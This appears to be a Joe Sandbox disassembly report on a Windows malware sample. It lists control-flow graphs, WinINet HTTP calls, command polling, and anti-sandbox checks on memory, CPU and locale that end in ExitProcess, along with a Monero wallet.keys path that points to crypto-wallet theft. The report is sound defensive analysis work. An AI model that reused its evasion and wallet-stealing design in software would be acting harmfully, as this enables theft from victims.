                                control_flow_graph 1033 8b6280-8b630b call 8ca7a0 call 8b47b0 call 8ca740 InternetOpenA StrCmpCA 1040 8b630d 1033->1040 1041 8b6314-8b6318 1033->1041 1040->1041 1042 8b6509-8b6525 call 8ca7a0 call 8ca800 * 2 1041->1042 1043 8b631e-8b6342 InternetConnectA 1041->1043 1061 8b6528-8b652d 1042->1061 1044 8b6348-8b634c 1043->1044 1045 8b64ff-8b6503 InternetCloseHandle 1043->1045 1047 8b635a 1044->1047 1048 8b634e-8b6358 1044->1048 1045->1042 1050 8b6364-8b6392 HttpOpenRequestA 1047->1050 1048->1050 1052 8b6398-8b639c 1050->1052 1053 8b64f5-8b64f9 InternetCloseHandle 1050->1053 1055 8b639e-8b63bf InternetSetOptionA 1052->1055 1056 8b63c5-8b6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 8b642c-8b644b call 8c8940 1056->1058 1059 8b6407-8b6427 call 8ca740 call 8ca800 * 2 1056->1059 1066 8b64c9-8b64e9 call 8ca740 call 8ca800 * 2 1058->1066 1067 8b644d-8b6454 1058->1067 1059->1061 1066->1061 1070 8b64c7-8b64ef InternetCloseHandle 1067->1070 1071 8b6456-8b6480 InternetReadFile 1067->1071 1070->1053 1074 8b648b 1071->1074 1075 8b6482-8b6489 1071->1075 1074->1070 1075->1074 1079 8b648d-8b64c5 call 8ca9b0 call 8ca8a0 call 8ca800 1075->1079 1079->1071
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • InternetOpenA.WININET(008D0DFE,00000001,00000000,00000000,00000000), ref: 008B62E1
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008B63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008B63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008B646D
                                • InternetCloseHandle.WININET(00000000), ref: 008B64EF
                                • InternetCloseHandle.WININET(00000000), ref: 008B64F9
                                • InternetCloseHandle.WININET(00000000), ref: 008B6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET$p{
                                • API String ID: 3749127164-3508196275
                                • Opcode ID: 1b36a623f0208cc0e16b73c1e96062d2010e19a5c899bd0a27cba3fbea9a6db9
                                • Instruction ID: 41e05542c1099938d1d0bc5d37b53633a1015b165f457ee453f1eedb2a64f0fe
                                • Opcode Fuzzy Hash: 1b36a623f0208cc0e16b73c1e96062d2010e19a5c899bd0a27cba3fbea9a6db9
                                • Instruction Fuzzy Hash: 38710F71A00218ABDB24DFE4DC59FEE7774FB44704F108159F509AB290EBB4AA85CF52

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 8c5510-8c5577 call 8c5ad0 call 8ca820 * 3 call 8ca740 * 4 1106 8c557c-8c5583 1090->1106 1107 8c5585-8c55b6 call 8ca820 call 8ca7a0 call 8b1590 call 8c51f0 1106->1107 1108 8c55d7-8c564c call 8ca740 * 2 call 8b1590 call 8c52c0 call 8ca8a0 call 8ca800 call 8caad0 StrCmpCA 1106->1108 1124 8c55bb-8c55d2 call 8ca8a0 call 8ca800 1107->1124 1134 8c5693-8c56a9 call 8caad0 StrCmpCA 1108->1134 1138 8c564e-8c568e call 8ca7a0 call 8b1590 call 8c51f0 call 8ca8a0 call 8ca800 1108->1138 1124->1134 1139 8c57dc-8c5844 call 8ca8a0 call 8ca820 * 2 call 8b1670 call 8ca800 * 4 call 8c6560 call 8b1550 1134->1139 1140 8c56af-8c56b6 1134->1140 1138->1134 1270 8c5ac3-8c5ac6 1139->1270 1143 8c56bc-8c56c3 1140->1143 1144 8c57da-8c585f call 8caad0 StrCmpCA 1140->1144 1148 8c571e-8c5793 call 8ca740 * 2 call 8b1590 call 8c52c0 call 8ca8a0 call 8ca800 call 8caad0 StrCmpCA 1143->1148 1149 8c56c5-8c5719 call 8ca820 call 8ca7a0 call 8b1590 call 8c51f0 call 8ca8a0 call 8ca800 1143->1149 1163 8c5865-8c586c 1144->1163 1164 8c5991-8c59f9 call 8ca8a0 call 8ca820 * 2 call 8b1670 call 8ca800 * 4 call 8c6560 call 8b1550 1144->1164 1148->1144 1249 8c5795-8c57d5 call 8ca7a0 call 8b1590 call 8c51f0 call 8ca8a0 call 8ca800 1148->1249 1149->1144 1170 8c598f-8c5a14 call 8caad0 StrCmpCA 1163->1170 1171 8c5872-8c5879 1163->1171 1164->1270 1199 8c5a28-8c5a91 call 8ca8a0 call 8ca820 * 2 call 8b1670 call 8ca800 * 4 call 8c6560 call 8b1550 1170->1199 1200 8c5a16-8c5a21 Sleep 1170->1200 1178 8c587b-8c58ce call 8ca820 call 8ca7a0 call 8b1590 call 8c51f0 call 8ca8a0 call 8ca800 1171->1178 1179 8c58d3-8c5948 call 8ca740 * 2 call 8b1590 call 8c52c0 call 8ca8a0 call 8ca800 call 8caad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 8c594a-8c598a call 8ca7a0 call 8b1590 call 8c51f0 call 8ca8a0 call 8ca800 1179->1275 1199->1270 1200->1106 1249->1144 1275->1170
                                APIs
                                  • Part of subcall function 008CA820: lstrlen.KERNEL32(008B4F05,?,?,008B4F05,008D0DDE), ref: 008CA82B
                                  • Part of subcall function 008CA820: lstrcpy.KERNEL32(008D0DDE,00000000), ref: 008CA885
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5857
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5228
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5318
                                  • Part of subcall function 008C52C0: lstrlen.KERNEL32(00000000), ref: 008C532F
                                  • Part of subcall function 008C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 008C5364
                                  • Part of subcall function 008C52C0: lstrlen.KERNEL32(00000000), ref: 008C5383
                                  • Part of subcall function 008C52C0: lstrlen.KERNEL32(00000000), ref: 008C53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 008C5A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$bz
                                • API String ID: 507064821-2187572780
                                • Opcode ID: 3902c31b7918aae3db904cb032a9d2db7c86369f65f5394981e60ba34187b100
                                • Instruction ID: a20320b65cebf7b4b97364a64cc38eb8ccb59bb28320f06ee1476d7f0d2dd83a
                                • Opcode Fuzzy Hash: 3902c31b7918aae3db904cb032a9d2db7c86369f65f5394981e60ba34187b100
                                • Instruction Fuzzy Hash: B6E1EC719101089BCB18FBA8EC96FED7378FB54344F50852CA506D6191EF34AA4ACBA3

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 8c17a0-8c17cd call 8caad0 StrCmpCA 1304 8c17cf-8c17d1 ExitProcess 1301->1304 1305 8c17d7-8c17f1 call 8caad0 1301->1305 1309 8c17f4-8c17f8 1305->1309 1310 8c17fe-8c1811 1309->1310 1311 8c19c2-8c19cd call 8ca800 1309->1311 1313 8c199e-8c19bd 1310->1313 1314 8c1817-8c181a 1310->1314 1313->1309 1316 8c18ad-8c18be StrCmpCA 1314->1316 1317 8c18cf-8c18e0 StrCmpCA 1314->1317 1318 8c198f-8c1999 call 8ca820 1314->1318 1319 8c1849-8c1858 call 8ca820 1314->1319 1320 8c1821-8c1830 call 8ca820 1314->1320 1321 8c185d-8c186e StrCmpCA 1314->1321 1322 8c187f-8c1890 StrCmpCA 1314->1322 1323 8c1835-8c1844 call 8ca820 1314->1323 1324 8c1970-8c1981 StrCmpCA 1314->1324 1325 8c18f1-8c1902 StrCmpCA 1314->1325 1326 8c1951-8c1962 StrCmpCA 1314->1326 1327 8c1932-8c1943 StrCmpCA 1314->1327 1328 8c1913-8c1924 StrCmpCA 1314->1328 1348 8c18ca 1316->1348 1349 8c18c0-8c18c3 1316->1349 1350 8c18ec 1317->1350 1351 8c18e2-8c18e5 1317->1351 1318->1313 1319->1313 1320->1313 1344 8c187a 1321->1344 1345 8c1870-8c1873 1321->1345 1346 8c189e-8c18a1 1322->1346 1347 8c1892-8c189c 1322->1347 1323->1313 1338 8c198d 1324->1338 1339 8c1983-8c1986 1324->1339 1329 8c190e 1325->1329 1330 8c1904-8c1907 1325->1330 1335 8c196e 1326->1335 1336 8c1964-8c1967 1326->1336 1333 8c194f 1327->1333 1334 8c1945-8c1948 1327->1334 1331 8c1926-8c1929 1328->1331 1332 8c1930 1328->1332 1329->1313 1330->1329 1331->1332 1332->1313 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 8c18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 008C17C5
                                • ExitProcess.KERNEL32 ref: 008C17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: cc3c5ad5001a36cf9b8226228ea46a64d4ef230eccfd0df43c7cc492fcdc4036
                                • Instruction ID: 9780c00e8e9f1f9c1abde11d2254fa2257fc3cf67d552afdad1289857b54cc01
                                • Opcode Fuzzy Hash: cc3c5ad5001a36cf9b8226228ea46a64d4ef230eccfd0df43c7cc492fcdc4036
                                • Instruction Fuzzy Hash: 9D5145B4A04209ABCB04DFA0D998FBE7BB5FB45708F10815DE40AE7341D774E946CB62

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 8c7500-8c754a GetWindowsDirectoryA 1357 8c754c 1356->1357 1358 8c7553-8c75c7 GetVolumeInformationA call 8c8d00 * 3 1356->1358 1357->1358 1365 8c75d8-8c75df 1358->1365 1366 8c75fc-8c7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 8c75e1-8c75fa call 8c8d00 1365->1367 1369 8c7628-8c7658 wsprintfA call 8ca740 1366->1369 1370 8c7619-8c7626 call 8ca740 1366->1370 1367->1365 1377 8c767e-8c768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008C7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008C757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C760A
                                • wsprintfA.USER32 ref: 008C7640
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: 9b73c9645b7f79644d15e566aa439dccaf401ea281f9c61836ac4a316e3c0079
                                • Instruction ID: 8a3f06434345684e9d63fa7c2b983055f1a6f31c98ae76462ab27a6bafb7698f
                                • Opcode Fuzzy Hash: 9b73c9645b7f79644d15e566aa439dccaf401ea281f9c61836ac4a316e3c0079
                                • Instruction Fuzzy Hash: E54150B1904258ABDB10DBD8DC45FEEBBB8FB18714F104199F509A7280D774AA44CFA6

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0708), ref: 008C98A1
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0720), ref: 008C98BA
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0540), ref: 008C98D2
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0570), ref: 008C98EA
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0738), ref: 008C9903
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B8B18), ref: 008C991B
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007A6440), ref: 008C9933
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007A6360), ref: 008C994C
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0768), ref: 008C9964
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0780), ref: 008C997C
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B07C8), ref: 008C9995
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B05B8), ref: 008C99AD
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007A6200), ref: 008C99C5
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B07E0), ref: 008C99DE
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008B11D0: ExitProcess.KERNEL32 ref: 008B1211
                                  • Part of subcall function 008B1160: GetSystemInfo.KERNEL32(?), ref: 008B116A
                                  • Part of subcall function 008B1160: ExitProcess.KERNEL32 ref: 008B117E
                                  • Part of subcall function 008B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008B112B
                                  • Part of subcall function 008B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 008B1132
                                  • Part of subcall function 008B1110: ExitProcess.KERNEL32 ref: 008B1143
                                  • Part of subcall function 008B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008B123E
                                  • Part of subcall function 008B1220: __aulldiv.LIBCMT ref: 008B1258
                                  • Part of subcall function 008B1220: __aulldiv.LIBCMT ref: 008B1266
                                  • Part of subcall function 008B1220: ExitProcess.KERNEL32 ref: 008B1294
                                  • Part of subcall function 008C6770: GetUserDefaultLangID.KERNEL32 ref: 008C6774
                                  • Part of subcall function 008B1190: ExitProcess.KERNEL32 ref: 008B11C6
                                  • Part of subcall function 008C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008B11B7), ref: 008C7880
                                  • Part of subcall function 008C7850: RtlAllocateHeap.NTDLL(00000000), ref: 008C7887
                                  • Part of subcall function 008C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008C789F
                                  • Part of subcall function 008C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7910
                                  • Part of subcall function 008C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008C7917
                                  • Part of subcall function 008C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008C792F
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008C6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 008C6AF9
                                • Sleep.KERNEL32(00001770), ref: 008C6B04
                                • CloseHandle.KERNEL32(?,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6B1A
                                • ExitProcess.KERNEL32 ref: 008C6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: 28fe70555c6341785da8a053089c1ab61ee62a5f132b5b4b0a8c08b65c097ea0
                                • Instruction ID: cd8fc680aafa9f5232e88600f0783fcc591c08c447f481e46f2131d586a58696
                                • Opcode Fuzzy Hash: 28fe70555c6341785da8a053089c1ab61ee62a5f132b5b4b0a8c08b65c097ea0
                                • Instruction Fuzzy Hash: 6D31A971900108AADB08F7E8E856FEE7778FB14744F504528F512E6291EF74A905CAA7

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 8b1220-8b1247 call 8c89b0 GlobalMemoryStatusEx 1439 8b1249-8b1271 call 8cda00 * 2 1436->1439 1440 8b1273-8b127a 1436->1440 1441 8b1281-8b1285 1439->1441 1440->1441 1443 8b129a-8b129d 1441->1443 1444 8b1287 1441->1444 1446 8b1289-8b1290 1444->1446 1447 8b1292-8b1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008B123E
                                • __aulldiv.LIBCMT ref: 008B1258
                                • __aulldiv.LIBCMT ref: 008B1266
                                • ExitProcess.KERNEL32 ref: 008B1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 44fcd64e320271e6754c404e25c732c754f74fc880f62710e95c618ab704198b
                                • Instruction ID: d58ed0f00eab35e3ae20e9a945e2f664772433c8e2c6f68539a34b1470bf45b4
                                • Opcode Fuzzy Hash: 44fcd64e320271e6754c404e25c732c754f74fc880f62710e95c618ab704198b
                                • Instruction Fuzzy Hash: 7001FFB0944308EAEF10EBE4DC59BEDBB78FB14705F608058E605FA280D774A5458799

                                Control-flow Graph
